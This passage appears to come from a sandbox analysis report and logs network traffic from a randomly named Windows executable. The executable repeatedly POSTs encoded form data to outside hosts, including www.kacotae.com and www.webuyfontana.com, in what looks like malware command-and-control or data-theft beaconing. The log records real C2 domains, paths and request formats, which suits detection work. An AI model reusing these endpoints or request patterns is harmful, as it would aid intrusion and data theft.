Jun 13, 2024 11:06:32.316473007 CEST	424	IN	Data Raw: 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 Data Ascii: margin-top: 20px } .orangebtn:hover { color: #fff; background-color: #f16600; } .banner1 h1 { font-size: 48px; color: #feff07;
Jun 13, 2024 11:06:32.316670895 CEST	1236	IN	Data Raw: 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 35 30 70 78 3b 0d 0a 20 20 20 Data Ascii: } .domain-con { padding: 20px 50px; position: relative; } .left { background: #f6f6f6 url(http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_j
Jun 13, 2024 11:06:32.316682100 CEST	1236	IN	Data Raw: 31 70 78 20 73 6f 6c 69 64 20 23 31 30 37 31 64 32 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 35 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 35 36 70 78 3b 0d 0a 20 20 20 Data Ascii: 1px solid #1071d2; height: 56px; line-height: 56px; font-size: 20px; text-align: center } .imgpic { padding: 25px 0 20px 0 }
Jun 13, 2024 11:06:32.316693068 CEST	1236	IN	Data Raw: 3e 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 73 74 2e 63 6e 2f 79 6b 6a 2f 76 69 65 77 2e 61 73 70 3f 64 6f 6d 61 69 6e 3d 7a 68 75 61 6e 2d 74 6f 75 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 6f 72 61 Data Ascii: ></span><a href="https://www.west.cn/ykj/view.asp?domain=zhuan-tou.com" class="orangebtn" target="_blank">Buy it !</a></p> </div> </div> <div class="main-out "> <div class="wrap "> <div clas
Jun 13, 2024 11:06:32.316703081 CEST	299	IN	Data Raw: 20 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 Data Ascii: var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49756	64.226.69.42	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:37.562277079 CEST	706	OUT	POST /1134/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.kacotae.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.kacotae.com Referer: http://www.kacotae.com/1134/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 45 54 4d 72 75 77 75 6c 76 45 76 37 76 77 56 73 43 41 73 6e 36 68 59 62 76 4c 74 75 79 36 6b 31 69 33 4d 59 67 4f 70 55 35 59 6d 52 6b 2b 2f 34 34 36 6f 49 50 58 35 2f 4e 31 79 43 6d 5a 32 4a 4c 36 76 38 45 48 46 4f 56 42 71 44 68 63 34 32 54 64 7a 32 55 6b 42 7a 62 5a 68 44 57 68 34 33 42 57 43 73 68 63 79 62 55 6f 43 42 39 6a 65 56 5a 4e 50 51 4f 6b 45 70 7a 4b 65 68 48 50 6e 66 53 35 41 47 76 6d 65 54 55 47 62 66 41 58 62 78 32 2f 71 58 33 4e 34 55 6c 44 42 76 44 62 78 65 48 4e 66 34 44 74 73 63 61 2f 30 5a 6c 61 51 44 4e 74 73 49 59 2b 4d 4b 38 4c 66 55 71 2f 32 64 41 30 35 4a 57 77 6f 3d Data Ascii: fD=ETMruwulvEv7vwVsCAsn6hYbvLtuy6k1i3MYgOpU5YmRk+/446oIPX5/N1yCmZ2JL6v8EHFOVBqDhc42Tdz2UkBzbZhDWh43BWCshcybUoCB9jeVZNPQOkEpzKehHPnfS5AGvmeTUGbfAXbx2/qX3N4UlDBvDbxeHNf4Dtsca/0ZlaQDNtsIY+MK8LfUq/2dA05JWwo=
Jun 13, 2024 11:06:38.402101040 CEST	300	IN	HTTP/1.1 404 Not Found Server: openresty Date: Thu, 13 Jun 2024 09:06:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49757	64.226.69.42	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:40.102705002 CEST	726	OUT	POST /1134/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.kacotae.com Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.kacotae.com Referer: http://www.kacotae.com/1134/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 45 54 4d 72 75 77 75 6c 76 45 76 37 76 51 46 73 45 6a 45 6e 74 52 59 63 68 72 74 75 72 71 6b 35 69 33 51 59 67 4b 5a 39 36 72 53 52 71 2f 50 34 35 37 6f 49 66 48 35 2f 48 56 7a 4a 37 4a 32 47 4c 36 7a 30 45 43 46 4f 56 42 57 44 68 65 77 32 54 75 4c 35 58 55 42 31 55 35 68 42 4c 78 34 33 42 57 43 73 68 63 57 78 55 70 6d 42 39 53 75 56 62 76 6e 54 51 55 45 71 30 4b 65 68 55 66 6e 62 53 35 41 30 76 6b 71 39 55 41 66 66 41 56 7a 78 34 4e 53 51 67 39 34 57 6f 6a 41 52 54 35 34 48 4b 4d 66 34 47 4f 56 38 4e 4f 63 30 67 73 39 70 58 50 6b 67 4c 65 67 79 73 59 58 6a 37 50 58 30 61 58 70 35 49 6e 39 39 50 31 48 41 6c 43 62 51 77 64 41 7a 34 4f 78 76 6d 63 6c 66 Data Ascii: fD=ETMruwulvEv7vQFsEjEntRYchrturqk5i3QYgKZ96rSRq/P457oIfH5/HVzJ7J2GL6z0ECFOVBWDhew2TuL5XUB1U5hBLx43BWCshcWxUpmB9SuVbvnTQUEq0KehUfnbS5A0vkq9UAffAVzx4NSQg94WojART54HKMf4GOV8NOc0gs9pXPkgLegysYXj7PX0aXp5In99P1HAlCbQwdAz4Oxvmclf
Jun 13, 2024 11:06:40.947716951 CEST	300	IN	HTTP/1.1 404 Not Found Server: openresty Date: Thu, 13 Jun 2024 09:06:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49758	64.226.69.42	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:42.640311956 CEST	1743	OUT	POST /1134/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.kacotae.com Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.kacotae.com Referer: http://www.kacotae.com/1134/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 45 54 4d 72 75 77 75 6c 76 45 76 37 76 51 46 73 45 6a 45 6e 74 52 59 63 68 72 74 75 72 71 6b 35 69 33 51 59 67 4b 5a 39 36 72 4b 52 71 4e 33 34 37 59 41 49 63 48 35 2f 4c 31 79 4f 37 4a 32 68 4c 36 72 77 45 43 35 42 56 45 61 44 67 38 49 32 62 2f 4c 35 4d 6b 42 31 4d 35 68 41 57 68 34 75 42 57 53 57 68 63 47 78 55 70 6d 42 39 52 32 56 66 39 50 54 53 55 45 70 7a 4b 65 54 48 50 6e 2f 53 35 5a 44 76 6e 47 44 54 77 2f 66 46 46 44 78 31 59 47 51 69 64 34 51 76 6a 41 5a 54 35 6b 69 4b 4d 44 4f 47 50 78 61 4e 4e 4d 30 6a 39 41 65 4d 50 6f 6d 58 49 77 6c 75 2f 66 38 70 71 62 47 61 57 39 38 4c 30 64 59 47 31 75 76 6f 32 76 32 33 4d 6c 6d 67 71 39 43 72 5a 34 30 41 4b 78 47 34 71 4e 43 79 74 56 34 43 2b 42 69 70 76 50 41 67 64 77 6e 7a 73 68 34 6e 47 6a 64 48 75 4a 53 69 76 45 6e 6f 43 54 56 4e 46 37 33 63 7a 6b 72 45 52 64 63 6d 57 38 38 74 2f 64 6f 79 31 6b 75 4d 34 37 4b 47 4f 6e 56 4d 4c 6f 79 57 36 35 47 53 7a 4a 70 78 4f 56 2f 6b 74 47 61 46 6f 2b 31 6a 31 30 4d 4b 65 33 6a 4e 31 4b 33 7a 73 4a [TRUNCATED] Data Ascii: fD=ETMruwulvEv7vQFsEjEntRYchrturqk5i3QYgKZ96rKRqN347YAIcH5/L1yO7J2hL6rwEC5BVEaDg8I2b/L5MkB1M5hAWh4uBWSWhcGxUpmB9R2Vf9PTSUEpzKeTHPn/S5ZDvnGDTw/fFFDx1YGQid4QvjAZT5kiKMDOGPxaNNM0j9AeMPomXIwlu/f8pqbGaW98L0dYG1uvo2v23Mlmgq9CrZ40AKxG4qNCytV4C+BipvPAgdwnzsh4nGjdHuJSivEnoCTVNF73czkrERdcmW88t/doy1kuM47KGOnVMLoyW65GSzJpxOV/ktGaFo+1j10MKe3jN1K3zsJh0X80V6U37Gv8vZbddJJeSGnD4xrOVfXd+Zwl+PBREtKT0yY2MBWuyRE4Uqfe9hISIrAkG4LnCvN8Wu5cr5e02f47+3f46dHHWNtZlRnVW9A+PUbsMq0yw2iYAuc7CFaItUDXRKvUWsdaov2PKTNiDU0o84FW6a/BC2SObvjUNY0pE5cc1iyaGmRaJyeNGbReN/2+dnbwQnls4XtY+BkqHtEExfo/0AqllM67b/1U7iF+LZa4X2l3bZYaMvdStdcQSwUh1Z5rsy04PIovcyX4Dgm7Vre37PFHHfY9Y978WkFkyxgfnDu+zl8QFxulz8pgbcK3VPMWel6tCxXkgvqeq7XqT1ECi/B5JaaqHvUVWcE8OTThB8cLWNkZw8b8EgNF5Dgq1VSw38p+Fq6CONyFBi4gxRMffCkXIvJjWBNij9p7sVpsvMIo6BE4yGFT8guADB1NDiB/I9fH70XqBXENil+AFeIOOiY3Fw4FdijUcISuj2bgfmHMQ0MzGgSl/UM/eMXG5EVAvno2IlcfxVfZFZWnHumqhaf65mK2uOP9ayKtY2f0GcCBWjQ6j2556gmdsWljCJATwzmYPXdrjgz2gefb3rJA5xZtjoigR7yUmR0IPGd70401lIES2i0gtXyhuQBusbGGtHEJLvJL/cRwwN/3SDkul7NjR [TRUNCATED]
Jun 13, 2024 11:06:43.493549109 CEST	300	IN	HTTP/1.1 404 Not Found Server: openresty Date: Thu, 13 Jun 2024 09:06:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49759	64.226.69.42	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:45.183947086 CEST	450	OUT	GET /1134/?fD=JRkLtFSsjC7w4kQ+Hghs1xAb5q91nLV93kknhelN5q6byYvj/Lx1HFkRT0D1h5CmR4/eZjEjURe15+EWWNTABSUQK+lvVBorOgW9ps6acI3n3nS9RerGGmYjuLu9ItylLw==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.kacotae.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:06:46.010099888 CEST	297	IN	HTTP/1.1 404 Not Found Server: openresty Date: Thu, 13 Jun 2024 09:06:45 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49760	15.197.204.56	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:51.331738949 CEST	721	OUT	POST /fhu0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.webuyfontana.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.webuyfontana.com Referer: http://www.webuyfontana.com/fhu0/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 39 39 66 38 4a 51 49 7a 66 4d 2f 4b 6b 55 4c 42 75 57 31 64 39 71 49 65 62 49 4e 31 66 49 36 63 44 36 4e 4f 72 31 69 39 41 6d 74 58 2b 67 32 7a 33 43 4b 71 75 6b 55 6b 50 6f 58 34 7a 6a 69 6a 2f 2b 44 39 2f 46 44 4e 5a 53 79 55 34 55 62 6e 61 4f 38 2f 35 6f 63 58 31 70 73 32 36 61 2f 47 67 6d 57 4e 4e 58 45 38 44 64 72 34 48 41 68 34 51 4d 34 78 62 78 72 54 72 41 69 4c 37 75 4e 49 38 6c 2b 4b 6c 36 4e 6b 74 47 30 4f 62 5a 53 66 67 35 62 47 2b 78 73 37 6c 69 52 65 32 4f 77 6b 2b 2f 4e 74 64 35 76 34 4e 4c 63 4d 6d 67 51 37 78 49 6b 49 49 30 47 30 32 30 30 4f 72 46 58 51 58 77 48 65 67 4e 49 3d Data Ascii: fD=99f8JQIzfM/KkULBuW1d9qIebIN1fI6cD6NOr1i9AmtX+g2z3CKqukUkPoX4zjij/+D9/FDNZSyU4UbnaO8/5ocX1ps26a/GgmWNNXE8Ddr4HAh4QM4xbxrTrAiL7uNI8l+Kl6NktG0ObZSfg5bG+xs7liRe2Owk+/Ntd5v4NLcMmgQ7xIkII0G0200OrFXQXwHegNI=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49761	15.197.204.56	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:53.869693041 CEST	741	OUT	POST /fhu0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.webuyfontana.com Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.webuyfontana.com Referer: http://www.webuyfontana.com/fhu0/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 39 39 66 38 4a 51 49 7a 66 4d 2f 4b 6c 77 50 42 68 56 74 64 78 61 49 52 55 6f 4e 31 55 6f 36 59 44 36 42 4f 72 30 58 32 42 55 35 58 2b 46 53 7a 32 47 6d 71 74 6b 55 6b 42 49 58 39 2b 44 69 71 2f 2b 48 31 2f 41 6a 4e 5a 53 4f 55 34 56 72 6e 61 35 6f 38 72 49 63 56 35 4a 73 30 6e 71 2f 47 67 6d 57 4e 4e 55 34 57 44 64 6a 34 48 7a 35 34 66 49 4d 32 53 52 72 51 69 67 69 4c 32 4f 4e 45 38 6c 2f 76 6c 37 52 43 74 44 77 4f 62 59 69 66 68 6f 62 46 72 68 73 39 71 43 51 62 2f 65 45 73 37 63 31 77 57 66 76 34 4d 39 63 32 71 32 39 52 72 71 73 67 62 55 71 4d 6d 6e 38 35 36 31 32 35 4e 54 58 75 2b 61 65 2f 68 44 43 77 63 34 31 6b 48 48 6b 44 2b 2f 59 6e 44 69 56 69 Data Ascii: fD=99f8JQIzfM/KlwPBhVtdxaIRUoN1Uo6YD6BOr0X2BU5X+FSz2GmqtkUkBIX9+Diq/+H1/AjNZSOU4Vrna5o8rIcV5Js0nq/GgmWNNU4WDdj4Hz54fIM2SRrQigiL2ONE8l/vl7RCtDwObYifhobFrhs9qCQb/eEs7c1wWfv4M9c2q29RrqsgbUqMmn856125NTXu+ae/hDCwc41kHHkD+/YnDiVi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49762	15.197.204.56	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:56.402291059 CEST	1758	OUT	POST /fhu0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.webuyfontana.com Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.webuyfontana.com Referer: http://www.webuyfontana.com/fhu0/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 39 39 66 38 4a 51 49 7a 66 4d 2f 4b 6c 77 50 42 68 56 74 64 78 61 49 52 55 6f 4e 31 55 6f 36 59 44 36 42 4f 72 30 58 32 42 55 42 58 2f 32 71 7a 33 6e 6d 71 73 6b 55 6b 4a 6f 58 38 2b 44 6a 6f 2f 36 72 78 2f 41 2f 33 5a 58 43 55 35 33 6a 6e 52 72 51 38 68 49 63 56 78 70 73 33 36 61 2f 54 67 6d 6d 4a 4e 58 41 57 44 64 6a 34 48 32 31 34 57 38 34 32 65 78 72 54 72 41 6a 4b 37 75 4e 6f 38 6b 61 53 6c 37 56 30 73 33 45 4f 62 34 79 66 6a 65 6e 46 32 52 73 2f 72 43 51 39 2f 65 5a 79 37 63 35 38 57 66 79 64 4d 36 51 32 76 51 63 4a 2f 4c 4d 34 4e 79 36 76 32 6d 77 55 72 41 53 43 4e 68 58 61 39 70 57 6d 75 77 6d 48 64 64 78 4a 52 6c 74 61 69 61 49 6e 4f 55 49 30 55 55 30 38 4e 79 48 38 6e 69 78 69 53 6c 34 4f 58 2b 73 42 6b 73 47 53 58 47 70 73 65 4a 37 56 44 66 6a 62 36 55 54 64 4f 52 38 4b 35 55 50 64 4c 4e 35 41 36 72 76 66 63 71 2f 44 47 42 48 4e 79 72 35 65 66 43 65 64 55 37 46 63 58 2b 6d 2b 49 42 41 33 67 74 30 77 6f 6c 62 36 67 76 74 6f 6b 76 59 6c 44 51 59 52 64 6b 62 41 2f 6c 72 55 62 6a 43 [TRUNCATED] Data Ascii: fD=99f8JQIzfM/KlwPBhVtdxaIRUoN1Uo6YD6BOr0X2BUBX/2qz3nmqskUkJoX8+Djo/6rx/A/3ZXCU53jnRrQ8hIcVxps36a/TgmmJNXAWDdj4H214W842exrTrAjK7uNo8kaSl7V0s3EOb4yfjenF2Rs/rCQ9/eZy7c58WfydM6Q2vQcJ/LM4Ny6v2mwUrASCNhXa9pWmuwmHddxJRltaiaInOUI0UU08NyH8nixiSl4OX+sBksGSXGpseJ7VDfjb6UTdOR8K5UPdLN5A6rvfcq/DGBHNyr5efCedU7FcX+m+IBA3gt0wolb6gvtokvYlDQYRdkbA/lrUbjCoxft3X5z4aZLBXlDX7cvkga/OsXXto35eRTia1eK4Ff249CvoKBsyxXD9/JMT5JxVesifMUR1fgO8P4vviKsHrAiLSwKpde0t14yLMhY5qtEHKNAuPmLka0ab57d/0unWxK8yT58ejPa9a+O9ZA8kIK9HtU7Uf+2qSmDlWBwnka5lM+D0LAKP0HIQJL3/HRxUuj8Oo8n3dUrL3Oh1NJDrUA4RvxdVCUkjvG4zxsS03vhcLyXYvVrmViVLEbb1qSe6KTQUxUywlpLTo/P1RmoHPXZ0B4iTleq+NhLFBy0F+Prf/Sh8nVIwJJb0Z0iPviEZfQGA+mh6unyELIliKikcm955y+txy9X6KofX6x5Z8mY5ETirnNFIjcCqGBYzgqG8MuAtIxlOqJxa41qA5z4vsAq9MgNJ9UlVU9xZqoYHA7IrrviL9Ekn3WMxEpatnlNJCPLT6yuQKw+DjZ71DlGk4l0l00H4bmqDX5D5MGAdR1u6rOmhVicJKaSM9ISFxU7r93IWc/s0c11oAvh4rftizCAvTFzbNxS6gqTdO3jVm+oxlt0zOBthdAMDY5u5/tvStWzjyaGbOe9hBd11lPDUbNFkKIEvpJXzsH7jNAl9D46DTVTUIKlZmQbslEivHQWpvcgmM1rI4kvkfpHuFn1pxhNjX5kfPpv6+ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49763	15.197.204.56	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:58.931592941 CEST	455	OUT	GET /fhu0/?fD=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.webuyfontana.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:06:59.826473951 CEST	404	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 13 Jun 2024 09:06:59 GMT Content-Type: text/html Content-Length: 264 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 44 3d 77 2f 33 63 4b 6c 59 4f 5a 37 2f 75 35 67 6d 37 70 56 39 66 2f 4b 55 61 44 70 52 65 58 59 36 69 54 4a 42 66 71 33 75 68 46 57 39 73 69 77 75 78 37 56 36 31 71 58 39 43 53 37 2f 38 36 67 72 2b 33 4a 66 63 31 52 79 58 64 53 48 49 6b 55 7a 61 66 71 55 76 75 4b 5a 72 6f 63 68 4a 6b 59 58 59 6e 7a 53 77 4b 45 34 38 4f 4b 58 41 46 48 52 6d 61 71 38 69 65 47 33 52 31 77 37 49 39 4d 49 53 76 77 3d 3d 26 6a 30 3d 76 54 63 6c 5f 32 58 38 51 4a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fD=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&j0=vTcl_2X8QJ"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49764	104.21.14.186	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
